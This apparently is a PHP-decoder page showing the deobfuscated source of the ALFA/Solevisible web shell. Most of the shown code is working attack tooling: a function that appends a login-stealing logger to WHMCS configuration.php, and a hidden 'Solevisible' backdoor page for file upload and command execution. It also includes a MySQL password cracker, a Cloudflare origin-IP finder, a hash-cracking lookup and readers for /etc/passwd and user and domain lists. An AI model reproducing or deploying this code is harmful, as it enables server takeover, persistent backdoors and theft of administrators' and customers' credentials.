PHP Decode

<?php } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_ex..

Decoded Output download

<?php  } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_exists("curl_version")) { $curl = new AlfaCURL(); $server_addr = !@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????" : @$_SERVER["SERVER_ADDR"]; $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr); $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]); if (strpos($flag2, "geoplugin") != false) { $flag = json_decode($flag, true); $flag2 = json_decode($flag2, true); if (!empty($flag["geoplugin_countryCode"])) { $flags["server"]["name"] = $flag["geoplugin_countryName"]; $flags["server"]["code"] = $flag["geoplugin_countryCode"]; } if (!empty($flag2["geoplugin_countryCode"])) { $flags["client"]["name"] = $flag2["geoplugin_countryName"]; $flags["client"]["code"] = $flag2["geoplugin_countryCode"]; } } } echo json_encode($flags); } goto Q03qj; ppnhy: if (!isset($GLOBALS["DB_NAME"]["login_page"])) { die("$GLOBALS['DB_NAME']['login_page']"); } goto TMWW9; XTnlF: function __pre() { return "<pre id="strOutput" style="margin-top:5px" class="ml1">"; } goto KOYJ5; FVVeJ: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto dfoFS; fCNwV: function Alfa_Mysql_Cracker($info) { if (@mysqli_connect($info["target"] . ":" . $info["port"], $info["username"], $info["password"])) { CrackerResualt($info); echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . 
"</font><font color="green">  Login Success....</font><br>"; } } goto i2b2c; kS5vr: function hijackWhmcs($path, $saveto) { $code = "<?php if(isset($_POST['username']) AND isset($_POST['password']) AND !empty($_POST['username']) AND !empty($_POST['password'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST['username'];$alfa_pw = @$_POST['password'];if(isset($_POST['language'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = '$alfa_uname' AND `password` = '".md5($alfa_pw)."'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = '$alfa_uname'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(':', $row['password']);$__encPW = md5($__salt[1].$_POST['password']).':'.$__salt[1];if($row['password'] == $__encPW){$allow = true;$row['username'] = $row['email'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row['username'] . ' : ' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? 'is_admin' : 'is_user')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>"; $code = str_replace("{saveto_path}", $saveto, $code); $conf = $path . "/configuration.php"; if (@is_file($conf) and @is_writable($conf)) { $data_conf = @file_get_contents($conf); if (!strstr($data_conf, "?>")) { $code = "?>" . $code; } $evil_conf = $data_conf . "\xa" . 
$code; @file_put_contents($conf, $evil_conf); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto qpgQy; kr6dX: function alfacloudflare() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit="g('cloudflare',null,this.url.value,'>>'); return false;" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder="target.com"> <input type='submit' name='go' value=' ' /></p></form></center>"; if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { $url = $_POST["alfa1"]; if (!preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url)) { $url = preg_replace("/^(https?):\/\//", '', $url); $url = "http://www." . $url; } $headers = @get_headers($url, 1); $server = $headers["Server"]; $subs = array("owa.", "2tty.", "m.", "gw.", "mx1.", "store.", "1", "2", "vb.", "news.", "download.", "video", "cpanel.", "ftp.", "server1.", "cdn.", "cdn2.", "ns.", "ns3.", "mail.", "webmail.", "direct.", "direct-connect.", "record.", "ssl.", "dns.", "help.", "blog.", "irc.", "forum.", "dl.", "my.", "cp.", "portal.", "kb.", "support.", "search.", "docs.", "files.", "accounts.", "secure.", "register.", "apps.", "beta.", "demo.", "smtp.", "ns2.", "ns1.", "server.", "shop.", "host.", "web.", "cloud.", "api.", "exchange.", "app.", "vps.", "owa.", "sat.", "bbs.", "movie.", "music.", "art.", "fusion.", "maps.", "forums.", "acc.", "cc.", "dev.", "ww42.", "wiki.", "clients.", "client.", "books.", "answers.", "service.", "groups.", "images.", "upload.", "up.", "tube.", "users.", "admin.", "administrator.", "private.", "design.", "whmcs.", "wp.", "wordpress.", "joomla.", "vbulletin.", "test.", "developer.", "panel.", "contact."); if (preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url, $matches)) { if ($matches[2] != "www") { $url = preg_replace("/^(https?):\/\//", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } if (is_array($server)) { $server = $server[0]; } echo __pre(); if (preg_match("/cloudflare/i", $server)) { echo "\xa[+] CloudFlare detected: {$server}\xa<br>"; } else { echo "
[+] CloudFlare wasn't detected, proceeding anyway.
"; } echo "[+] CloudFlare IP: " . is_ipv4(gethostbyname($url)) . "

<br><br>"; echo "[+] Searching for more IP addresses.\xa\xa<br><br>"; for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . $url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "(Null)") { continue; } echo "Trying {$site}: {$ip}
<br>"; } echo "\xa[+] Finished.
<br>"; } echo "</div>"; alfafooter(); } goto SXwEV; GIU6h: function _alfa_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { $http = "POST {$uri} HTTP/1.0\xd
"; $http .= "Host: {$server}
\xa"; $http .= "User-Agent: " . $_SERVER["HTTP_USER_AGENT"] . "
"; $http .= "Content-Type: application/x-www-form-urlencoded
\xa"; $http .= "Content-length: " . strlen($post) . "
"; $http .= "Connection: close\xd
\xd
"; $http .= $post . "
\xa
"; fwrite($socket, $http); $contents = ''; while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } list($header, $body) = explode("\xd
\xd
", $contents, 2); @fclose($socket); return $body; } else { return ''; } } goto i_y5V; pr1zO: function alfacheckcgi() { if (strlen(alfaEx("id", false, true, true)) > 0) { echo "ok"; } else { echo "no"; } } goto nWc3X; mG6El: $OVpGNqqFZs = "e" . "v" . "al"; goto W1P0Y; TMWW9: if (!isset($GLOBALS["DB_NAME"]["show_icons"])) { die("$GLOBALS['DB_NAME']['show_icons']"); } goto uDSKO; VBrHH: function alfaarchive_manager() { alfahead(); $file = $_POST["alfa2"]; if (!file_exists($file)) { $file = $GLOBALS["cwd"]; } $rand_id = rand(9999, 999999); echo "<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>"; echo "<form name="srch" onSubmit="g('archive_manager',null,null,this.file.value,null,null,'>>');return false;" method='post'>
	<div class="txtfont">
	Archive file: <input size="50" id="target" type="text" name="file" value="" . $file . "">\xa\x9<input type="submit" name="btn" value=" "></div></form></center><br>"; if ($_POST["alfa5"] == ">>") { echo "<hr><div style="margin-left: 12px;" archive_full="phar://" . $file . "" archive_name="" . basename($file) . "" id="archive_dir_" . $rand_id . "" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>"; echo "<div style="padding: 10px;" id="archive_base_" . $rand_id . "">"; __alfa_open_archive_file($file, $rand_id); echo "</div>"; } echo "</div>"; alfafooter(); } goto Sp5QA; he7vt: function alfacpcrack() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g('cpcrack',null,'dec')">| DeCrypter | </a><a href=javascript:void(0) onclick="g('cpcrack',null,'analyzer')">| Hash Analyzer | </a></h3></center>"; if ($_POST["alfa1"] == "dec") { $algorithms = array("md5" => "MD5", "md4" => "MD4", "sha1" => "SHA1", "sha256" => "SHA256", "sha384" => "SHA384", "sha512" => "SHA512", "ntlm" => "NTLM"); echo "<center><div class="txtfont_header">| DeCrypter |</div><br><br>\xa<form onsubmit="g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">"; foreach ($algorithms as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } echo "</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { $hash_type = $_POST["alfa4"]; $email = "[email protected]"; $code = "7b9fa79f92c3cd96"; $target = "https://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . 
$code; $resp = @file_get_contents($target); if ($resp == '') { $get = new AlfaCURL(); $resp = $get->Send($target); } echo __pre() . "<center>"; switch ($resp) { case "CODE ERREUR : 001": echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>"; break; case "CODE ERREUR : 003": echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>"; break; case "CODE ERREUR : 004": echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>"; break; case "CODE ERREUR : 005": echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>"; break; } if (substr($resp, 0, 4) != "CODE" && $resp != '') { echo "<b>Result: <font color='green'>" . $resp . "</font></b>"; } elseif (substr($resp, 0, 4) != "CODE") { echo "<font color='red'>NoT Found</font><br />"; } echo "</center>"; } } } if ($_POST["alfa1"] == "analyzer") { echo "<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>\xa<form onsubmit="g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;">\xa<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { $curl = new AlfaCURL(); $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search"); echo __pre() . "<center>"; if (preg_match("#<fieldset class="trouve">(.*?)</fieldset>#", $resp, $s)) { echo "<font color="green">" . $s[1] . 
"</font>"; } else { echo "<font color="red">Not Found...!</font>"; } echo "</center><br>"; } } } echo "</div>"; alfafooter(); } goto BhkkX; i_y5V: if (isset($_GET["solevisible"])) { @error_reporting(E_ALL ^ E_NOTICE); echo "<html>"; echo "<title>Solevisible Hidden Shell</title>"; echo "<body bgcolor=#000000>"; echo "<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">" . (function_exists("php_uname") ? php_uname() : "???") . "</font></b></big>"; $safe_mode = @ini_get("safe_mode"); if ($safe_mode) { $r = "<b style='color: red'>On</b>"; } else { $r = "<b style='color: green'>Off</b>"; } echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>"; echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />"; echo "PWD:<font color=#FFFFFF> " . str_replace("\", "/", @alfaGetCwd()) . "/<br />"; echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>"; echo "<font color=#7CFC00>Disable functions : </font>"; $disfun = @ini_get("disable_functions"); if (empty($disfun)) { $disfun = "<font color="green">NONE</font>"; } echo "<font color=red>"; echo "{$disfun}"; echo "</font><br>"; echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists("gethostbyname") ? @gethostbyname($_SERVER["HTTP_HOST"]) : "???") . "</font><br><p>"; echo "<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "CWD: <input type="text" name="cwd" value="" . str_replace("\", "/", @alfaGetCwd()) . 
"/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>"; if (isset($_FILES["file"])) { if (@move_uploaded_file($_FILES["file"]["tmp_name"], __ZGVjb2Rlcg(@$_POST["cwd"]) . "/" . $_FILES["file"]["name"])) { echo "<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>"; } else { echo "<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>"; } } echo "<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>\xa<hr><pre>"; if (isset($_POST["command_solevisible"])) { if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $separator = "&"; } else { $separator = ";"; } $solevisible = "cd '" . addslashes(str_replace("\", "/", @alfaGetCwd())) . "'" . $separator . '' . __ZGVjb2Rlcg($_POST["command_solevisible"]); echo alfaEx($solevisible); } echo "</pre>
</body></html>"; die; } goto nhViU; BXSlk: @set_time_limit(0); goto Os8cj; pQYlh: function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { if ($ext != "*") { $f = basename($path); $f = explode(".", $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == "str") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\", "/", $path) . "<br>"; } } else { if (strstr($value, $string)) { echo str_replace("\", "/", $path) . "<br>"; } } $results[] = $path; } elseif ($value != "." && $value != "..") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } goto zHgw5; HL3qe: function alfaEx($in, $re = false, $cgi = true, $all = false) { $data = _alfa_php_cmd($in, $re); if (empty($data) && $cgi || $all) { if ($GLOBALS["sys"] == "unix") { if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) { $cmd = _alfa_cgicmd($in); if (!empty($cmd)) { return $cmd; } } } } return $data; } goto KtNd0; rUSPf: @ini_set("log_errors", 0); goto CrZw0; oMz56: function __alfa_set_cookie($key, $value) { $_COOKIE[$key] = $value; @setcookie($key, $value, time() + 86400 * 7, "/"); } goto hId6W; qr6DC: function __alert($s) { echo "<center>" . __pre() . $s . "</center>"; } goto Wo4n0; HVzUJ: if ($GLOBALS["sys"] == "win") { $GLOBALS["home_cwd"] = str_replace("\", "/", $GLOBALS["home_cwd"]); $GLOBALS["cwd"] = str_replace("\", "/", $GLOBALS["cwd"]); } goto FN_bJ; zUXll: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { $res = "<font color='green'>[ Success...! ]</font>"; $err = "<font color='red'>[ Failed...! ]</font>"; if ($evalOptions != '') { $evalOptions = $evalOptions . " "; } if ($evalArguments != '') { $evalArguments = " " . 
$evalArguments; } if ($evalType == "c") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq . ".c"; $path = $filename; if (__write_file($path, $evalCode)) { $ext = $GLOBALS["sys"] == "win" ? ".exe" : ".out"; $pathres = $filename . $ext; $evalOptions = "-o " . $pathres . " " . $evalOptions; $cmd = "gcc " . $evalOptions . $path; alfaEx($cmd); if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = $pathres . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } elseif ($evalType == "java") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq; $evalCode = "class " . $filename . " { " . $evalCode . " } "; } $path = $filename . ".java"; if (__write_file($path, $evalCode)) { $cmd = "javac " . $evalOptions . $path; alfaEx($cmd); $pathres = $filename . ".class"; if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = "java " . $filename . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } return false; } goto PnxkJ; wK3Iv: function hijackOutput($c = 0, $p = '') { echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : "<center><font color="red">Error in inject code !</font></center>"; } goto pQYlh; eiihp: function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . 
$s); } } goto tWrGE; TWvKj: function alfaSettings() { alfahead(); AlfaNum(6, 7, 8, 9, 10); echo "<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g('settings',null,null,null,null,null,null,null,null,'main')">| Generall Setting | </a></h3></center>"; if ($_POST["alfa8"] == "main") { echo "<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method='post'>"; $lg_array = array("0" => "No", "1" => "Yes"); $penc_array = array("false" => "No", "true" => "Yes"); $protect_html = ''; $icon_html = ''; $postEnc_html = ''; $login_html = ''; $cgiapi_html = ''; foreach ($lg_array as $key => $val) { $protect_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["safemode"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } foreach ($lg_array as $key => $val) { $icon_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["show_icons"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } foreach ($penc_array as $key => $val) { $cgiapi_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa9"]) && $_POST["alfa9"] == $key ? "selected" : ($GLOBALS["DB_NAME"]["cgi_api"] && empty($_POST["alfa9"]) ? "selected" : '')) . ">" . $val . "</option>"; } foreach ($penc_array as $key => $val) { $postEnc_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa7"]) && $_POST["alfa7"] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["alfa7"]) ? "selected" : '')) . ">" . $val . "</option>"; } $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound"); foreach ($lg_array as $key => $val) { $login_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["login_page"] == $key ? "selected" : '') . ">" . $val . 
"</option>"; } echo ''; echo "<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">" . $protect_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">" . $cgiapi_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">" . $postEnc_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">" . $icon_html . "</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">" . $login_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="" . (empty($_POST["alfa3"]) ? $GLOBALS["DB_NAME"]["user"] : $_POST["alfa3"]) . "" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="" . $GLOBALS["DB_NAME"]["safemode"] . ""><input type="hidden" name="s" value="" . $GLOBALS["DB_NAME"]["show_icons"] . 
""><p><input type="submit" name="btn" value=" "></p></form></center>"; if ($_POST["alfa5"] == ">>") { echo __pre(); if (!empty($_POST["alfa3"])) { $protect = $_POST["alfa1"]; $lgpage = $_POST["alfa2"]; $username = $_POST["alfa3"]; $password = md5($_POST["alfa4"]); $icon = $_POST["alfa6"]; $post_encrypt = $_POST["alfa7"]; $cgi_api_val = $_POST["alfa9"]; @chdir($GLOBALS["home_cwd"]); $basename = @basename($_SERVER["PHP_SELF"]); $data = @file_get_contents($basename); $user_rand = $GLOBALS["DB_NAME"]["user_rand"]; $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"]; $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"]; $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"]; $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"]; $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"]; $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"]; $find_user = "/'" . $user_rand . "'(.*?),/i"; $find_pw = "/'" . $pass_rand . "'(.*?),/i"; $find_lg = "/'" . $login_page_rand . "'(.*?),/i"; $find_p = "/'" . $safemode_rand . "'(.*?),/i"; $icons = "/'" . $show_icons_rand . "'(.*?),/i"; $postEnc = "/'" . $post_encryption_rand . "'(.*?),/i"; $cgi_api_reg = "/'" . $cgi_api_rand . "'(.*?),/i"; if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "'" . $user_rand . "' => '" . $username . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($_POST["alfa4"]) && preg_match($find_pw, $data, $e)) { $new = "'" . $pass_rand . "' => '" . $password . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "'" . $login_page_rand . "' => '" . $lgpage . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "'" . $safemode_rand . "' => '" . $protect . "',"; $data = str_replace($e[0], $new, $data); } if (preg_match($icons, $data, $e)) { $new = "'" . $show_icons_rand . "' => '" . $icon . 
"',"; $data = str_replace($e[0], $new, $data); } if (preg_match($postEnc, $data, $e)) { $new = "'" . $post_encryption_rand . "' => " . $post_encrypt . ","; $data = str_replace($e[0], $new, $data); } if (preg_match($cgi_api_reg, $data, $e)) { $new = "'" . $cgi_api_rand . "' => " . $cgi_api_val . ","; $data = str_replace($e[0], $new, $data); } if (@file_put_contents($basename, $data)) { echo "<b>UserName: </b><font color="green"><b>" . $username . "</b></font><br /><b>Password: </b><font color="green"><b>" . $_POST["alfa4"] . "</b></font><script>post_encryption_mode = " . $post_encrypt . ";</script>"; } else { __alert("<span style='color:red;'>File has no edit access...!</span>"); } } else { __alert("<span style='color:red;'>UserName is Empty !</span>"); } } } elseif ($_POST["alfa8"] == "color") { echo "<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method='post'>"; echo "<table border="1"><tbody>"; $template = "<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>"; $x = 1; foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { $multi = ''; if (is_array($value)) { if (isset($value["multi_selector"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } $value = alfa_getColor($key); $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key)); echo str_replace(array("{index}", "{target}", "{color}", "{multi}", 
"{help}"), array($x++, $key, $value, $multi, $help), $template); } echo "<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>"; echo "</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$('importFileBtn').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g('settings',null,null,null,null,null,null,null,'export','color')" class="button"> Export </button></center></p>"; if ($_POST["alfa7"] == "export") { echo __pre(); $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array(); $glob_colors = $GLOBALS["__ALFA_COLOR__"]; $array = array(); foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array[$k] = $v; } $file = "alfa_color_config_" . date("Y-m-d-h_i_s") . ".conf"; $config = json_encode($array, JSON_PRETTY_PRINT); if (!@file_put_contents($file, $config)) { echo "<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">" . $config . "</textarea></center></p>"; } else { echo "<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'" . $file . "', 'download')"><font color="#0F0">Download Config</font></a></center></p></h3>"; } } if ($_POST["alfa2"] == ">>") { echo __pre(); $colors = json_decode($_POST["alfa1"], true); $array = ''; $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false; $glob_colors = $GLOBALS["__ALFA_COLOR__"]; foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? 
$v["key_color"] : $v); } $array .= """ . trim($k) . "" => "" . $v . "","; } @chdir($GLOBALS["home_cwd"]); $basename = @basename($_SERVER["PHP_SELF"]); $data = @file_get_contents($basename); $color = "/'color'(.*?)\),/s"; if (preg_match($color, $data, $e)) { $new = "'color' => array(" . $array . "),"; $data = str_replace($e[0], $new, $data); if (@file_put_contents($basename, $data)) { echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>"; } else { echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>"; } } else { echo "<center><p><h3>[-] Error...!</h3></p></center>"; } } } echo "</div>"; alfafooter(); } goto YNiqE; K5MFn: $GLOBALS["DB_NAME"] = $GLOBALS["oZgNypoPRU"]; goto r05Ia; i8Olb: $xd .= "Site : " . $_SERVER["HTTP_HOST"] . "
"; goto FRkec; IGhSm: function _alfa_is_writable($file) { $check = false; $check = @is_writable($file); if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("[ -w "" . trim(addslashes($file)) . "" ] && echo "yes" || echo "no""); if ($check == "yes") { $check = true; } else { $check = false; } } } return $check; } goto HZNvy; ar_2Q: function alfasafe() { alfahead(); echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>"; echo "<h3><a href=javascript:void(0) onclick="g('safe',null,'php.ini',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g('safe',null,null,'ini')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,'pl')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,'passwd')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,'users')">| Read-Users | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,'valiases')">| Get-User | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,null,null,'domains')">| Get-Domains | </a></center></h3>"; if (!empty($_POST["alfa8"]) && isset($_POST["alfa8"]) == "domains") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { echo __pre(); $solevisible9 = _alfa_file("/etc/named.conf"); if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("zone", $solevisible13)) { preg_match_all("#zone "(.*)"#", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . "<br>"; } } } } } else { echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); if (is_array($users)) { foreach ($users as $boz) { $dom = explode(":", $boz); echo $dom[0] . "
"; } } } } if (!empty($_POST["alfa6"]) && isset($_POST["alfa6"]) == "valiases") { echo "
